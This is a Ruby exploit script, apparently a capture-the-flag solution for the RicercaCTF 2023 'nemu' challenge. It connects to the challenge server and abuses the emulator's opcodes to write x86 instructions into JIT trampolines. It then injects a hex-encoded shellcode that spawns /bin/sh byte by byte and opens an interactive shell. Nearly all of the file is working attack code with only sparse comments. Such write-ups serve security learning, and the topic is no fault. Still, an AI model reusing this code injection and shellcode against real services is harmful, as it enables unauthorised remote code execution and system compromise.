ricercactf2023-nemu.rb

require 'socket'
require 'expect'
require 'io/interactive'

class S < TCPSocket
  def wait
    # expect 'opcode:'
  end

  def initialize
    # super 'localhost', 4567
    super 'nemu.2023.ricercactf.com', 9002
  end

  def load imm
    wait
    puts 1
    puts '#%d' % imm
  end
  def mov reg
    wait
    puts 2
    puts 'r%d' % reg
  end
  def dbl reg
    wait
    puts 4
    puts 'r%d' % reg
  end
  def addi imm
    wait
    puts 5
    puts '#%d' % imm
  end
  def add reg
    wait
    puts 6
    puts 'r%d' % reg
  end
end

# 0x7fffffffdcd0 ra
# 0x7fffffffdcd4 r3
# 0x7fffffffdcd8 r2
# 0x7fffffffdcdc r1
# 0x7fffffffdce0 trampoline.add
# 0x7fffffffdcfc trampoline.addi
# 0x7fffffffdd18 trampoline.dbl

s = S.new
s.load 0x90909057   # push rdi
s.mov 1             # r1 <- push rdi
32.times{ s.dbl 1 } # *trampoline.add <- push rdi

# https://shell-storm.org/shellcode/files/shellcode-806.html
x = '31c048bbd19d9691d08c97ff48f7db53545f995257545eb03b0f05'
shellcode = [x.split.join].pack("H*")

shellcode.bytes.each_with_index do |b, i|
  # s.load 0x032847c6; s.mov 3 # mov BYTE PTR [rdi+0x28],3 = mov BYTE PTR [cfc], 3

  x = [b, 0x28 + i, 0x47, 0xc6].pack("C*").unpack1("N")
  s.load x;          s.mov 3 ; # r3 <- mov BYTE PTR [rdi+0x28+i], b
  s.load 0x000000c3; s.mov 2 ; # r2 <- ret
  s.add 3 # call trampoline.add with rdi=&r3
end

s.addi 0 # jmp to trampoline.addi

s.interactive! # shell!